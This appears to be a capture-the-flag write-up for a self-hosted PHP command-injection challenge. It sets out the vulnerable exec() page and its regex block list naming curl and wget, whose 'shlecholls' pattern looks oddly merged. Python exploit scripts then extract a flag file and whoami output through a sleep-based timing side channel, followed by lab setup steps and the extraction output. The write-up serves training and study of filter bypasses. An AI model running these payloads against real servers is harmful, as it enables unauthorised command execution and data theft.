1 Deployed in an Ubuntu environment under WSL
2 Challenge
http://127.0.0.1/bypass1/bypass1.php
<?php
highlight_file(__FILE__);
$a = $_GET['a'];
if(!preg_match("/shlecholls|curl|wget|\"|'|\?|\*|>|</i",$a)){
@exec($a); // run the user-supplied command
}else{
die("Hacker"); // the filter matched: print an error instead
}
The filter rejects both kinds of quote, ?, *, < and > (plus the listed words), so redirection, globbing and quoted strings are out, but $(...), pipes, cut, tr and sleep all get through. exec() blocks until the command finishes and, with its return value discarded, nothing from the command is ever echoed back, so the remaining channel is time: make the injected command sleep for a recognisable number of seconds exactly when a guess about one output character is right.
3 EXP
3.1 exp1
import time
import requests
import string

url = "http://127.0.0.1/bypass1/bypass1.php"
# Try '3' first: a '3' in the output makes `sleep 3` fire for every guess,
# so it has to be confirmed before another guess can claim that position.
dicts = "3" + string.printable.replace("3", "")
command = "cat ./flag"
result = ""
for i in range(1, 50):
    found = False
    for j in dicts:
        # cut -c i picks character i of the output; tr j 3 turns it into "3"
        # only when it equals the guess, so sleep pauses ~3 s exactly on a hit.
        payload = "sleep $({}|cut -c {}|tr {} 3)".format(command, i, j)
        start = time.time()
        # params= URL-encodes the payload (a raw #, &, + or % would be mangled)
        requests.get(url, params={"a": payload}, timeout=30)
        end = time.time()
        # Upper bound: a digit d >= 4 in the output runs `sleep d` for any guess.
        if 3 <= end - start < 4:
            result += j
            found = True
            print(result)
            break
    if not found:
        break  # no guess matched: end of the output
3.2 exp2
import time
import requests
import string

url = "http://127.0.0.1/bypass1/bypass1.php"
# Try '3' first: a '3' in the output makes `sleep 3` fire for every guess,
# so it has to be confirmed before another guess can claim that position.
dicts = "3" + string.printable.replace("3", "")
command = "whoami"
result = ""
for i in range(1, 50):
    found = False
    for j in dicts:
        # cut -c i picks character i of the output; tr j 3 turns it into "3"
        # only when it equals the guess, so sleep pauses ~3 s exactly on a hit.
        payload = "sleep $({}|cut -c {}|tr {} 3)".format(command, i, j)
        start = time.time()
        # params= URL-encodes the payload (a raw #, &, + or % would be mangled)
        requests.get(url, params={"a": payload}, timeout=30)
        end = time.time()
        # Upper bound: a digit d >= 4 in the output runs `sleep d` for any guess.
        if 3 <= end - start < 4:
            result += j
            found = True
            print(result)
            break
    if not found:
        break  # no guess matched: end of the output
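The two scripts above differ only in `command`. As an added example that is not part of the original writeup, here is the same timing oracle factored so that the extraction loop can be exercised offline against a constructed stand-in for the vulnerable page, and then pointed at the real server by swapping the oracle. The names `build_payload`, `extract`, `make_simulated_oracle`, `make_http_oracle` and `CHARSET` are my own, the flag string in the stand-in is constructed, and the stand-in is an approximation: it models only the first output line and the handful of shell metacharacters listed in the code.

```python
import re
import string
import time
from typing import Callable

# An oracle maps (position, guess) to how long the HTTP request blocked, in seconds.
Oracle = Callable[[int, str], float]

# The challenge's preg_match filter, copied so the stand-in rejects what the server rejects.
FILTER = re.compile(r"shlecholls|curl|wget|\"|'|\?|\*|>|<", re.IGNORECASE)

# Guesses that can never work: rejected by the filter, or they break the `sh -c` line
# before `tr` runs (whitespace, pipes, comment and quoting characters).
BLOCKED = set("\"'?*<>")
SHELL_BREAKERS = set(string.whitespace) | set("|&;()`\\#")

# '3' goes first: a '3' in the output makes `sleep 3` fire for every guess,
# so it has to be confirmed before any other guess can claim the position.
CHARSET = ["3"] + [c for c in string.printable
                   if c != "3" and c not in BLOCKED and c not in SHELL_BREAKERS]


def build_payload(command: str, pos: int, guess: str) -> str:
    """The injected line: cut -c picks one character, tr turns it into '3' only on a hit."""
    return "sleep $({}|cut -c {}|tr {} 3)".format(command, pos, guess)


def extract(delay_for: Oracle, max_len: int = 50) -> str:
    """Recover the command output one character at a time from the timing oracle."""
    result = ""
    for pos in range(1, max_len + 1):
        hit = None
        for guess in CHARSET:
            delay = delay_for(pos, guess)
            # About 3 s means tr produced "3". A digit d >= 4 in the output runs
            # `sleep d` for every guess, so the upper bound keeps it from matching.
            if 3.0 <= delay < 4.0:
                hit = guess
                break
        if hit is None:
            break  # nothing matched: end of output (or an unprobeable character)
        result += hit
    return result


def make_simulated_oracle(output: str, command: str = "cat ./flag") -> Oracle:
    """Constructed stand-in for the vulnerable page (assumption: only the first output
    line and the metacharacters above are modelled). Returns the seconds exec() would
    block for, computed instantly instead of actually sleeping."""
    line = output.split("\n", 1)[0]

    def delay_for(pos: int, guess: str) -> float:
        if FILTER.search(build_payload(command, pos, guess)):
            return 0.0                                     # die("Hacker") runs before exec()
        if guess in SHELL_BREAKERS:
            return 0.0                                     # sh -c fails immediately
        ch = line[pos - 1] if pos <= len(line) else ""    # cut -c pos
        arg = "3" if ch == guess else ch                   # tr guess 3
        return float(arg) if arg.isdigit() else 0.0       # sleep arg; non-numeric: error, no delay
    return delay_for


def make_http_oracle(url: str, command: str) -> Oracle:
    """Oracle against the real target (assumption: the page is served at `url` with exec() enabled)."""
    import requests  # imported here so the offline simulation does not need it

    def delay_for(pos: int, guess: str) -> float:
        start = time.monotonic()
        # params= URL-encodes the payload; a raw '#', '&', '+' or '%' would be mangled.
        requests.get(url, params={"a": build_payload(command, pos, guess)}, timeout=30)
        return time.monotonic() - start
    return delay_for


if __name__ == "__main__":
    # Constructed flag for the offline run; against the lab use the HTTP oracle instead:
    # extract(make_http_oracle("http://127.0.0.1/bypass1/bypass1.php", "cat ./flag"))
    print(extract(make_simulated_oracle("flag{Thi0_1s_a_t3st}\n")))
```

The window `3.0 <= delay < 4.0` and the `'3'`-first charset matter together: with the original `>= 3` check and `string.printable` order, any digit 3 to 9 in the output would be reported as `'0'`, because `tr 0 3` leaves the digit alone and `sleep 5` still takes longer than three seconds. Over a real network, widen the window to cover the round-trip jitter you measure rather than assuming the local-lab figures.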
4 Solving process
4.0.1 Install a PHP environment on Ubuntu under WSL
Step 1: Remove Existing PHP Versions
First, let’s clean up any existing PHP 7.x installations:
sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:
autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ondřej Surý maintains up-to-date PHP packages for Ubuntu:
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 (this command installs only the php7.3 package; add extension packages separately if you need them):
sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you’re using Apache as your web server:
# Disable old PHP module (if any)
sudo a2dismod php7.0 # or whatever version you had before
# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache2
4.0.2 Give a regular user read, write and execute permission on /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ chown gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成 anaconda3 cookies.txt downloads snap summaries tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$
4.0.3 Put the challenge code and the flag in the corresponding locations under /var/www/html/
4.1 Run the EXP scripts above against the PHP page from VS Code
The PHP Debug and PHP Server extensions need to be installed.
4.2 Running the EXP scripts from VS Code
(base) gpu3090@DESKTOP-8IU6393:/var/www/html$ /usr/bin/python3 /var/www/html/bypass1/bypass_exp.py
f
fl
fla
flag
flag{
flag{T
flag{Th
flag{Thi
flag{Thi0
flag{Thi0_
flag{Thi0_1
flag{Thi0_1s
flag{Thi0_1s_
flag{Thi0_1s_d
flag{Thi0_1s_di
flag{Thi0_1s_dif
flag{Thi0_1s_diff
flag{Thi0_1s_diffi
flag{Thi0_1s_diffic
flag{Thi0_1s_difficu
flag{Thi0_1s_difficul
flag{Thi0_1s_difficult
flag{Thi0_1s_difficult_
flag{Thi0_1s_difficult_y
flag{Thi0_1s_difficult_yo
flag{Thi0_1s_difficult_you
flag{Thi0_1s_difficult_you_
flag{Thi0_1s_difficult_you_a
flag{Thi0_1s_difficult_you_ar
flag{Thi0_1s_difficult_you_are
flag{Thi0_1s_difficult_you_are_
flag{Thi0_1s_difficult_you_are_g
flag{Thi0_1s_difficult_you_are_go
flag{Thi0_1s_difficult_you_are_goo
flag{Thi0_1s_difficult_you_are_good
flag{Thi0_1s_difficult_you_are_good}
(base) gpu3090@DESKTOP-8IU6393:/var/www/html$ /usr/bin/python3 /var/www/html/bypass1/bypass_exp1.py
w
ww
www
www-
www-d
www-da
www-dat
www-data